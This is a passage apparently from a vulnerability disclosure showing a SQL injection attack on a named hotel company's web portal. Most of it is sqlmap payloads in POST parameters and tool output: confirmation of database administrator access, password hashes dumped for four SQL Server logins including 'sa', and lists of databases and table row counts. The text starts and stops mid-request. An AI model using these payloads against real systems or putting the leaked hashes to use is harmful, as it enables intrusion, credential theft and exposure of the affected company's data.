xJENvbnRlbnRQbGFjZUhvbGRlcjIkY2JBbGxvd1BhZ2luZwVFY3RsMDAkY3RsMDAkQ29udGVudFBsYWN
lSG9sZGVyMSRDb250ZW50UGxhY2VIb2xkZXIyJGlidG5BZHZhbmNlZFF1ZXJ5BUBjdGwwMCRjdGwwMCR
Db250ZW50UGxhY2VIb2xkZXIxJENvbnRlbnRQbGFjZUhvbGRlcjIkaWJ0bk9yZGVyaW5nBUBjdGwwMCR
jdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJENvbnRlbnRQbGFjZUhvbGRlcjIkbGJPcmRlcmluZ05vBT5
jdGwwMCRjdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJENvbnRlbnRQbGFjZUhvbGRlcjIkcmJ0bkFzY2V
uZAU+Y3RsMDAkY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRDb250ZW50UGxhY2VIb2xkZXIyJHJidG5
Bc2NlbmQFP2N0bDAwJGN0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkQ29udGVudFBsYWNlSG9sZGVyMiR
yYnRuRGVzY2VuZAVBY3RsMDAkY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRDb250ZW50UGxhY2VIb2x
kZXIyJGxiT3JkZXJpbmdZZXMFPWN0bDAwJGN0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkQ29udGVudFB
sYWNlSG9sZGVyMiRndkJOX0Zvcm0PPCsADAEIAgFk1AaHLga3ih3M2ubiWQKM0xV416HWT3j8uNGC3+B
n5jU=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$wtxtAdvancedQuery$txtW
atermarked=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$wtxtAdvancedQuer
y$TextBoxWatermarkExtender1_ClientState=&ctl00$ctl00$ContentPlaceHolder1$Content
PlaceHolder2$cbAllowPaging=on&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder
2$hfOrdering=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$Order=rbtnDesc
end&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$lbOrderingYes=State&ctl0
0$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$lbOrderingYes=TheOrder&ctl00$ctl
00$ContentPlaceHolder1$ContentPlaceHolder2$hfAdvancedQuery=&ctl00$ctl00$ContentP
laceHolder1$ContentPlaceHolder2$txtFormName=1&ctl00$ctl00$ContentPlaceHolder1$Co
ntentPlaceHolder2$txtDescription=2&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceH
older2$ucCreateTime$scLeft=2015-07-28&ctl00$ctl00$ContentPlaceHolder1$ContentPla
ceHolder2$ucCreateTime$scRight=2015-08-11&ctl00$ctl00$ContentPlaceHolder1$Conten
tPlaceHolder2$ucLastModifyTime$scLeft=2015-08-05&ctl00$ctl00$ContentPlaceHolder1
$ContentPlaceHolder2$ucLastModifyTime$scRight=2015-08-06&ctl00$ctl00$ContentPlac
eHolder1$ContentPlaceHolder2$txtCreateUserName=3&ctl00$ctl00$ContentPlaceHolder1
$ContentPlaceHolder2$txtLastModifyUserName=4%' AND 3899=CONVERT(INT,(SELECT CHAR
(113)+CHAR(121)+CHAR(108)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (3899=3899) THE
N CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(105)+CHAR(110)+CHAR(113)
)) AND '%'='&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucTheOrder$scLe
ft=1&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucTheOrder$scRight=5&ct
l00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ddlState=&ctl00$ctl00$ContentP
laceHolder1$ContentPlaceHolder2$btnOKAdvancedQuery=%E7%A1%AE%E5%AE%9A
---
[20:10:18] [WARNING] changes made by tampering scripts are not included in shown
payload content(s)
there were multiple injection points, please select the one to use for following
injections:
[0] place: POST, parameter: ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$
txtFormName, type: Single quoted string (default)
[1] place: POST, parameter: ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$
txtCreateUserName, type: Single quoted string
[2] place: POST, parameter: ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$
txtDescription, type: Single quoted string
[3] place: POST, parameter: ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$
txtLastModifyUserName, type: Single quoted string
[q] Quit
> 0
[20:10:43] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
[20:10:43] [INFO] fetching current user
[20:10:43] [INFO] resumed: sa
current user: 'sa'
[20:10:43] [INFO] fetching current database
[20:10:43] [INFO] resumed: super8db
current database: 'super8db'
[20:10:43] [INFO] testing if current user is DBA
current user is DBA: True
database management system users [4]:
[*] ##MS_PolicyEventProcessingLogin##
[*] ##MS_PolicyTsqlExecutionLogin##
[*] myportal
[*] sa
database management system users password hashes:
[*] ##MS_PolicyEventProcessingLogin## [1]:
password hash: 0x010005d418f8c0a940550f9d11a7135f56045fce2e0a1754c495
header: 0x0100
salt: 05d418f8
mixedcase: c0a940550f9d11a7135f56045fce2e0a1754c495
[*] ##MS_PolicyTsqlExecutionLogin## [1]:
password hash: 0x0100b81612821c70d559c0381392a3e18659339515484385335f
header: 0x0100
salt: b8161282
mixedcase: 1c70d559c0381392a3e18659339515484385335f
[*] myportal [1]:
password hash: 0x01009b9f7553fbbca05677c781d8f3fd97fbe9b0326479c217ad
header: 0x0100
salt: 9b9f7553
mixedcase: fbbca05677c781d8f3fd97fbe9b0326479c217ad
[*] sa [1]:
password hash: 0x01002c6503ef9f84039673d6f5b1c6faa41f019ae40963430d2c
header: 0x0100
salt: 2c6503ef
mixedcase: 9f84039673d6f5b1c6faa41f019ae40963430d2c
available databases [9]:
[*] master
[*] model
[*] msdb
[*] ReportServer$SQL2008
[*] ReportServer$SQL2008TempDB
[*] su8
[*] super8db
[*] super8dbTest
[*] tempdb
Database: su8
+------------------------------+---------+
| Table | Entries |
+------------------------------+---------+
| dbo.ecs_admin_log | 8503 |
| dbo.ecs_region | 3430 |
| dbo.My_Quality | 2701 |
| dbo.My_Sup_Order | 1692 |
| dbo.My_Owners | 1252 |
| dbo.ecs_users | 1225 |
| dbo.Sheet2 | 594 |
| dbo.Sheet2_bak20141230 | 517 |
| dbo.My_Integral_log | 511 |
| dbo.Sheet2_bak20140820 | 426 |
| dbo.My_DepArticle | 398 |
| dbo.My_ProductsInfo | 385 |
| dbo.Sheet2_bak20130701 | 378 |
| dbo.Sheet | 347 |
| dbo.SheetBak20121231 | 347 |
| dbo.ecs_attribute | 216 |
| dbo.My_ProductsInfo_Photos | 213 |
| dbo.ecs_article | 189 |
| dbo.ecs_article_bak | 188 |
| dbo.ecs_order_action | 179 |
| dbo.My_Complaints | 179 |
| dbo.ecs_shop_config | 170 |
| dbo.ecs_admin_action | 153 |
| dbo.ecs_admin_comparison | 111 |
| dbo.ecs_goods | 92 |
| dbo.ecs_order_goods | 78 |
| dbo.ecs_vote_option | 76 |
| dbo.ecs_order_info | 74 |
| dbo.My_SubFile | 74 |
| dbo.View_users_order | 70 |
| dbo.View_order_goods_list | 61 |
| dbo.ecs_article_cat | 59 |
| dbo.View_order_integral | 58 |
| dbo.ecs_goods_attr | 53 |
| dbo.My_Article_TitImg | 46 |
| dbo.ecs_ad | 42 |
| dbo.ecs_goods_gallery | 42 |
| dbo.ecs_account_log | 41 |
| dbo.My_Suppliers | 39 |
| dbo.xy_region | 39 |
| dbo.ecs_member_price | 38 |
| dbo.ecs_feedback | 37 |
| dbo.View_user_message | 37 |
| dbo.ecs_volume_price | 33 |
| dbo.ecs_ad_position | 31 |
| dbo.ecs_vote_log | 30 |
| dbo.My_DepUser | 23 |
| dbo.ecs_admin_user | 22 |
| dbo.ecs_exchange_goods | 19 |
| dbo.My_Products | 19 |
| dbo.ecs_area_region | 17 |
| dbo.ecs_category | 17 |
| dbo.ecs_mail_templates | 17 |
| dbo.View_shipping | 17 |
| dbo.ecs_admin_message | 16 |
| dbo.My_Weighted | 15 |
| dbo.View_exchange_goods | 15 |
| dbo.ecs_delivery_goods | 14 |
| dbo.ecs_shipping | 14 |
| dbo.My_Departments | 14 |
| dbo.My_Supply_for | 14 |
| dbo.ecs_brand | 13 |
| dbo.ecs_goods_cat | 13 |
| dbo.My_WScore | 13 |
| dbo.View_WScore_Print | 13 |
| dbo.ecs_delivery_order | 12 |
| dbo.ecs_vote | 12 |
| dbo.ecs_goods_type | 11 |
| dbo.ecs_shipping_area | 11 |
| dbo.ecs_shipping_area_expand | 11 |
| dbo.ecs_user_address | 10 |
| dbo.Global_Settings | 10 |
| dbo.ecs_pay_log | 8 |
| dbo.My_QAph | 8 |
| dbo.ecs_comment | 7 |
| dbo.ecs_goods_activity | 7 |
| dbo.View_comment | 7 |
| dbo.ecs_tag | 6 |
| dbo.ecs_user_bonus | 6 |
| dbo.My_DepArticleCat | 6 |
| dbo.View_tag_manage | 6 |
| dbo.ecs_ad_index | 5 |
| dbo.ecs_kill_goods | 5 |
| dbo.ecs_role | 5 |
| dbo.ecs_snatch_log | 5 |
| dbo.View_user_snatch_log | 5 |
| dbo.ecs_bonus_type | 4 |
| dbo.ecs_payment | 4 |
| dbo.ecs_user_account | 4 |
| dbo.My_Annual_Rules | 4 |
| dbo.My_Hotel_type | 4 |
| dbo.Shop_Email | 4 |
| dbo.ecs_cat_recommend | 3 |
| dbo.ecs_goods_activity_0 | 3 |
| dbo.ecs_products | 3 |
| dbo.ecs_suppliers | 3 |
| dbo.My_Sup_Evaluation | 3 |
| dbo.View_My_Comments | 3 |
| dbo.ecs_booking_goods | 2 |
| dbo.ecs_cart | 2 |
| dbo.ecs_goods_activity_1 | 2 |
| dbo.ecs_goods_article | 2 |
| dbo.ecs_pack | 2 |
| dbo.ecs_package_goods | 2 |
| dbo.ecs_user_rank | 2 |
| dbo.My_Grading_Results | 2 |
| dbo.View_booking_goods | 2 |
| dbo.ecs_favourable_activity | 1 |
| dbo.ecs_friend_link | 1 |
| dbo.ecs_goods_activity_2 | 1 |
| dbo.ecs_group_goods | 1 |
| dbo.ecs_kill_user | 1 |
| dbo.ecs_link_goods | 1 |
| dbo.My_Annual_Rate | 1 |
| dbo.My_Buy_for | 1 |
| dbo.My_Rating_header | 1 |
| dbo.My_Score_results | 1 |
+------------------------------+---------+


自定义表单管理(搜索)

http://mys8.super8.com.cn:81/pages/bn/form/bn_formmanage.aspx (POST)
__EVENTTARGET=ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$btnQuery&__EVENTARGUMENT=&__VIEWSTATE=/w
EPDwUKMjA3ODgzNDEyMw8WBB4KUXVlcnlTdGF0ZQspZVN1cGVyOC5FbnRpdHkuQ29tbW9uLlF1ZXJ5U3RhdGUsIFN1cGVyOC5
FbnRpdHksIFZlcnNpb249MS4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1udWxsAh4OT3JkZXJDb25kaXR
pb24FGFN0YXRlIERFU0MsVGhlT3JkZXIgREVTQxYCZg9kFgJmD2QWAgIDD2QWAgIGD2QWAgIDD2QWCAIBD2QWDAIDDw8WA
h4HRW5hYmxlZGhkZAIFDw8WAh8CaGRkAgcPDxYCHwJoZGQCCQ8PFgIfAmhkZAILDw8WAh8CaGRkAhUPDxYCHg1XYXRlcm1h
cmtUZXh0BRXor7fovpPlhaXmn6Xor6LmnaHku7ZkFgJmD2QWAgIDDxYCHwMFFeivt%2Bi%2Bk
%2BWFpeafpeivouadoeS7tmQCAw88KwARAwAPFgoeC18hRGF0YUJvdW5kZx4Icm93Q291bnQCAR4RSXNFbXB0eURhdGFTb3Vy
Y2VnHgtfIUl0ZW1Db3VudGYeL0Vzb2Z0X19TbWFydEdyaWRWaWV3X19TbWFydFJhZGlvQnV0dG9uR3JvdXBOYW1lBRZTbWFydFJ
hZGlvQnV0dG9uQ29sdW1uZAEQFgAWABYADBQrAAAWAmYPZBYIAgEPZBYSZg8PFgIeBFRleHRlZGQCAQ8PFgIfCWVkZAICDw8
WAh8JZWRkAgMPDxYCHwllZGQCBA8PFgIfCWVkZAIFDw8WAh8JZWRkAgYPDxYCHwllZGQCBw8PFgIfCWVkZAIIDw8WAh8JZW
RkAgIPDxYCHgdWaXNpYmxlaGRkAgMPDxYCHwpoZGQCBA9kFgJmD2QWAmYPZBYCZg9kFgICAQ9kFgICAg9kFghmDw8WAh8
CaGRkAgEPDxYCHwJoZGQCAg8PFgIfAmhkZAIDDw8WAh8CaGRkAgcPZBYCAgMPZBYCZg9kFgICAw9kFggCBQ9kFgRmDw8WB
B4eRXNvZnRfX1NtYXJ0Q2FsZW5kYXJfX1RhcmdldElEBQdzY1JpZ2h0HwkFCjIwMTUtMDctMjhkZAICDw8WBB8LBQZzY0xlZnQfCQ
UKMjAxNS0wOC0xMWRkAgcPZBYEZg8PFgQfCwUHc2NSaWdodB8JBQoyMDE1LTA4LTA1ZGQCAg8PFgQfCwUGc2NMZWZ0Hw
kFCjIwMTUtMDgtMDZkZAIND2QWBGYPDxYCHwkFATFkZAICDw8WAh8JBQE1ZGQCDw8QDxYGHg1EYXRhVGV4dEZpZWxkBQ
VWYWx1ZR4ORGF0YVZhbHVlRmllbGQFBVZhbHVlHwRnZBAVDA0tLeivt
%2BmAieaLqS0tCeW3suWIoOmZpAnlt7LlgZznlKgJ5bey5ZCv55SoCeWPr%2Be8lui
%2BkQnlt7LnlJ/mlYgJ5b6F5a6h5qC4CeW3suWuoeaguAnlt7Lmi5Lnu50J5pyq5a6M5oiQCeW3suWujOaIkAnlt7Lmj5DkuqQVDAAJ
5bey5Yig6ZmkCeW3suWBnOeUqAnlt7LlkK/nlKgJ5Y%2Bv57yW6L6RCeW3sueUn
%2BaViAnlvoXlrqHmoLgJ5bey5a6h5qC4CeW3suaLkue7nQnmnKrlrozmiJAJ5bey5a6M5oiQCeW3suaPkOS6pBQrAwxnZ2dnZ2dnZ
2dnZ2dkZAIND2QWAgIDD2QWAmYPZBYCAgMPZBYEAgEPEGQQFQYM6KGo5Y2V5ZCN56ewBuaPj
%2Bi/sAzliJvlu7rml7bpl7QS5pyA5ZCO5L%2Bu5pS55pe26Ze0EuWIm%2BW7uueUqOaIt
%2BWQjeensBjmnIDlkI7kv67mlLnnlKjmiLflkI3np7AVBghGb3JtTmFtZQtEZXNjcmlwdGlvbgpDcmVhdGVUaW1lDkxhc3RNb2RpZnl
UaW1lDkNyZWF0ZVVzZXJOYW1lEkxhc3RNb2RpZnlVc2VyTmFtZRQrAwZnZ2dnZ2dkZAILDxBkDxYCZgIBFgIQBQ7nirbmgIEgIOW
AkuW6jwUFU3RhdGVnEAUR5o6S5bqP5Y
%2B3ICDlgJLluo8FCFRoZU9yZGVyZ2RkGAIFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYIBUFjdGwwMCRjdGwwMCRDb2
50ZW50UGxhY2VIb2xkZXIxJENvbnRlbnRQbGFjZUhvbGRlcjIkY2JBbGxvd1BhZ2luZwVFY3RsMDAkY3RsMDAkQ29udGVudFBsYWN
lSG9sZGVyMSRDb250ZW50UGxhY2VIb2xkZXIyJGlidG5BZHZhbmNlZFF1ZXJ5BUBjdGwwMCRjdGwwMCRDb250ZW50UGxhY2VIb
2xkZXIxJENvbnRlbnRQbGFjZUhvbGRlcjIkaWJ0bk9yZGVyaW5nBUBjdGwwMCRjdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJENvb
nRlbnRQbGFjZUhvbGRlcjIkbGJPcmRlcmluZ05vBT5jdGwwMCRjdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJENvbnRlbnRQbGFjZU
hvbGRlcjIkcmJ0bkFzY2VuZAU
%2BY3RsMDAkY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRDb250ZW50UGxhY2VIb2xkZXIyJHJidG5Bc2NlbmQFP2N0bDAwJG
N0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkQ29udGVudFBsYWNlSG9sZGVyMiRyYnRuRGVzY2VuZAVBY3RsMDAkY3RsMDAkQ29u
dGVudFBsYWNlSG9sZGVyMSRDb250ZW50UGxhY2VIb2xkZXIyJGxiT3JkZXJpbmdZZXMFPWN0bDAwJGN0bDAwJENvbnRlbnRQb
GFjZUhvbGRlcjEkQ29udGVudFBsYWNlSG9sZGVyMiRndkJOX0Zvcm0PPCsADAEIAgFk1AaHLga3ih3M2ubiWQKM0xV416HWT3j8u
NGC3%2BBn5jU%3D&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$wtxtAdvancedQuery
$txtWatermarked=1&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$wtxtAdvancedQuery
$TextBoxWatermarkExtender1_ClientState=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$cbAllowPaging=on&ctl00
$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$hfOrdering=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$Ord
er=rbtnDescend&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$lbOrderingYes=State&ctl00$ctl00$ContentPlaceHold
er1$ContentPlaceHolder2$lbOrderingYes=TheOrder&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$hfAdvancedQuer
y=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txtFormName=1&ctl00$ctl00$ContentPlaceHolder1$ContentPlace
Holder2$txtDescription=2&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucCreateTime$scLeft=2015-07-
28&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucCreateTime$scRight=2015-08-
11&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucLastModifyTime$scLeft=2015-08-
05&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucLastModifyTime$scRight=2015-08-
06&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txtCreateUserName=3&ctl00$ctl00$ContentPlaceHolder1$Content
PlaceHolder2$txtLastModifyUserName=4&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucTheOrder
$scLeft=1&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucTheOrder
$scRight=5&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ddlState=


ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$wtxtAdvancedQuery$txtWatermarked存在注入
<code>sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$wtxtAdvancedQuery
$txtWatermarked
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: __EVENTTARGET=ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$b
tnQuery&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMjA3ODgzNDEyMw8WBB4KUXVlcnlTdGF0ZQs
pZVN1cGVyOC5FbnRpdHkuQ29tbW9uLlF1ZXJ5U3RhdGUsIFN1cGVyOC5FbnRpdHksIFZlcnNpb249MS4
wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1udWxsAR4OT3JkZXJDb25kaXRpb24
FGFN0YXRlIERFU0MsVGhlT3JkZXIgREVTQxYCZg9kFgJmD2QWAgIDD2QWAgIGD2QWAgIDD2QWCAIBD2Q
WDAIDDw8WAh4HRW5hYmxlZGhkZAIFDw8WAh8CaGRkAgcPDxYCHwJoZGQCCQ8PFgIfAmhkZAILDw8WAh8
CaGRkAhUPDxYCHg1XYXRlcm1hcmtUZXh0BRXor7fovpPlhaXmn6Xor6LmnaHku7ZkFgJmD2QWAgIDDxY
CHwMFFeivt+i+k+WFpeafpeivouadoeS7tmQCAw88KwARAwAPFgweC18hRGF0YUJvdW5kZx4PQWxsU2V
sZWN0VmFsdWVzMswBAAEAAAD/////AQAAAAAAAAAEAQAAAH9TeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJ
pYy5MaXN0YDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU
9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAwAAAAZfaXRlbXMFX3NpemU
IX3ZlcnNpb24GAAAICAkCAAAAAAAAAAAAAAARAgAAAAAAAAALHgtfIUl0ZW1Db3VudAIBHi9Fc29mdF9
fU21hcnRHcmlkVmlld19fU21hcnRSYWRpb0J1dHRvbkdyb3VwTmFtZQUWU21hcnRSYWRpb0J1dHRvbkN
vbHVtbh4RSXNFbXB0eURhdGFTb3VyY2VoHghyb3dDb3VudAIBZAEQFgAWABYADBQrAAAWAmYPZBYIAgE
PD2QWAh4Kb25kYmxjbGljawW6A2lmKGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdDb250ZW50UGxhY2V
Ib2xkZXIxX0NvbnRlbnRQbGFjZUhvbGRlcjJfZ3ZCTl9Gb3JtX2N0bDAwXzAnKS5jaGVja2VkKXtyZXR
1cm47fWRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdDb250ZW50UGxhY2VIb2xkZXIxX0NvbnRlbnRQbGF
jZUhvbGRlcjJfZ3ZCTl9Gb3JtX2N0bDAwXzAnKS5jaGVja2VkPSFkb2N1bWVudC5nZXRFbGVtZW50Qnl
JZCgnQ29udGVudFBsYWNlSG9sZGVyMV9Db250ZW50UGxhY2VIb2xkZXIyX2d2Qk5fRm9ybV9jdGwwMF8
wJykuY2hlY2tlZDtfX2RvUG9zdEJhY2soJ2N0bDAwJGN0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkQ29
udGVudFBsYWNlSG9sZGVyMiRndkJOX0Zvcm0kY3RsMDIkY3RsMDAnLCdDb250ZW50UGxhY2VIb2xkZXI
xX0NvbnRlbnRQbGFjZUhvbGRlcjJfZ3ZCTl9Gb3JtX2N0bDAwXzAnKTsWEmYPZBYCZg8QDxYCHh5Fc29
mdF9fU21hcnRSYWRpb0J1dHRvbl9fVmFsdWUFIDVDQjYzOEIxMDc5OTQyMTJBNjc4MjgxQ0ZBNDM1N0I
zFgIeBXN0eWxlBQlib3JkZXI6MDtkZGQCAQ9kFgJmDxYCHgRUZXh0BQExZAICD2QWAgIBDw8WBB8NBSL
pgJ845Lit5Zu95Lia5Li75ruh5oSP5bqm6LCD5p+l6KGoHg9Db21tYW5kQXJndW1lbnQFIDVDQjYzOEI
xMDc5OTQyMTJBNjc4MjgxQ0ZBNDM1N0IzZGQCAw9kFgJmDxUBEzIwMTMtMTAtMjkgMTQ6MjQ6MDZkAgQ
PZBYCZg8VAQVhZG1pbmQCBQ9kFgJmDxUBEzIwMTMtMTAtMjkgMTQ6MjQ6MDZkAgYPZBYCZg8VAQVhZG1
pbmQCBw9kFgJmDxUBAGQCCA9kFgICAQ8PFgYfDQUJ5Y+v57yW6L6RHglGb3JlQ29sb3IKjQEeBF8hU0I
CBGRkAgIPDxYCHgdWaXNpYmxlaGRkAgMPDxYCHxFoZGQCBA9kFgJmD2QWAmYPZBYCZg9kFgICAQ9kFgI
CAg9kFghmDw8WAh8CaGRkAgEPDxYCHwJoZGQCAg8PFgIfAmhkZAIDDw8WAh8CaGRkAgcPZBYCAgMPZBY
CZg9kFgICAw9kFggCBQ9kFgRmDw8WBB4eRXNvZnRfX1NtYXJ0Q2FsZW5kYXJfX1RhcmdldElEBQdzY1J
pZ2h0Hw0FCjIwMTUtMDctMjhkZAICDw8WBB8SBQZzY0xlZnQfDQUKMjAxNS0wOC0xMWRkAgcPZBYEZg8
PFgQfEgUHc2NSaWdodB8NBQoyMDE1LTA4LTA1ZGQCAg8PFgQfEgUGc2NMZWZ0Hw0FCjIwMTUtMDgtMDZ
kZAIND2QWBGYPDxYCHw0FATFkZAICDw8WAh8NBQE1ZGQCDw8QDxYGHg1EYXRhVGV4dEZpZWxkBQVWYWx
1ZR4ORGF0YVZhbHVlRmllbGQFBVZhbHVlHwRnZBAVDA0tLeivt+mAieaLqS0tCeW3suWIoOmZpAnlt7L
lgZznlKgJ5bey5ZCv55SoCeWPr+e8lui+kQnlt7LnlJ/mlYgJ5b6F5a6h5qC4CeW3suWuoeaguAnlt7L
mi5Lnu50J5pyq5a6M5oiQCeW3suWujOaIkAnlt7Lmj5DkuqQVDAAJ5bey5Yig6ZmkCeW3suWBnOeUqAn
lt7LlkK/nlKgJ5Y+v57yW6L6RCeW3sueUn+aViAnlvoXlrqHmoLgJ5bey5a6h5qC4CeW3suaLkue7nQn
mnKrlrozmiJAJ5bey5a6M5oiQCeW3suaPkOS6pBQrAwxnZ2dnZ2dnZ2dnZ2dkZAIND2QWAgIDD2QWAmY
PZBYCAgMPZBYEAgEPEGQQFQYM6KGo5Y2V5ZCN56ewBuaPj+i/sAzliJvlu7rml7bpl7QS5pyA5ZCO5L+
u5pS55pe26Ze0EuWIm+W7uueUqOaIt+WQjeensBjmnIDlkI7kv67mlLnnlKjmiLflkI3np7AVBghGb3J
tTmFtZQtEZXNjcmlwdGlvbgpDcmVhdGVUaW1lDkxhc3RNb2RpZnlUaW1lDkNyZWF0ZVVzZXJOYW1lEkx
hc3RNb2RpZnlVc2VyTmFtZRQrAwZnZ2dnZ2dkZAILDxBkDxYCZgIBFgIQBQ7nirbmgIEgIOWAkuW6jwU
FU3RhdGVnEAUR5o6S5bqP5Y+3ICDlgJLluo8FCFRoZU9yZGVyZ2RkGAIFHl9fQ29udHJvbHNSZXF1aXJ
lUG9zdEJhY2tLZXlfXxYKBUFjdGwwMCRjdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJENvbnRlbnRQbGF
jZUhvbGRlcjIkY2JBbGxvd1BhZ2luZwVJY3RsMDAkY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRDb25
0ZW50UGxhY2VIb2xkZXIyJGd2Qk5fRm9ybSRjdGwwMiRjdGwwMAVJY3RsMDAkY3RsMDAkQ29udGVudFB
sYWNlSG9sZGVyMSRDb250ZW50UGxhY2VIb2xkZXIyJGd2Qk5fRm9ybSRjdGwwMiRjdGwwMAVFY3RsMDA
kY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRDb250ZW50UGxhY2VIb2xkZXIyJGlidG5BZHZhbmNlZFF
1ZXJ5BUBjdGwwMCRjdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJENvbnRlbnRQbGFjZUhvbGRlcjIkaWJ
0bk9yZGVyaW5nBUBjdGwwMCRjdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJENvbnRlbnRQbGFjZUhvbGR
lcjIkbGJPcmRlcmluZ05vBT5jdGwwMCRjdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJENvbnRlbnRQbGF
jZUhvbGRlcjIkcmJ0bkFzY2VuZAU+Y3RsMDAkY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRDb250ZW5
0UGxhY2VIb2xkZXIyJHJidG5Bc2NlbmQFP2N0bDAwJGN0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkQ29
udGVudFBsYWNlSG9sZGVyMiRyYnRuRGVzY2VuZAVBY3RsMDAkY3RsMDAkQ29udGVudFBsYWNlSG9sZGV
yMSRDb250ZW50UGxhY2VIb2xkZXIyJGxiT3JkZXJpbmdZZXMFPWN0bDAwJGN0bDAwJENvbnRlbnRQbGF
jZUhvbGRlcjEkQ29udGVudFBsYWNlSG9sZGVyMiRndkJOX0Zvcm0PPCsADAEIAgFklWH+I+vFQIbXQHw
fSRoxmfe8PlbafmYMf6uKxxomWtg=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder
2$wtxtAdvancedQuery$txtWatermarked=1%' AND 9113=9113 AND '%'='&ctl00$ctl00$Conte
ntPlaceHolder1$ContentPlaceHolder2$wtxtAdvancedQuery$TextBoxWatermarkExtender1_C
lientState=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$cbAllowPaging=on
&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$hfOrdering=&ctl00$ctl00$Con
tentPlaceHolder1$ContentPlaceHolder2$Order=rbtnDescend&ctl00$ctl00$ContentPlaceH
older1$ContentPlaceHolder2$lbOrderingYes=State&ctl00$ctl00$ContentPlaceHolder1$C
ontentPlaceHolder2$lbOrderingYes=TheOrder&ctl00$ctl00$ContentPlaceHolder1$Conten
tPlaceHolder2$hfAdvancedQuery=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolde
r2$txtFormName=1&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txtDescript
ion=2&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucCreateTime$scLeft=20
15-07-28&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucCreateTime$scRigh
t=2015-08-11&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucLastModifyTim
e$scLeft=2015-08-05&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucLastMo
difyTime$scRight=2015-08-06&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$
txtCreateUserName=3&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txtLastM
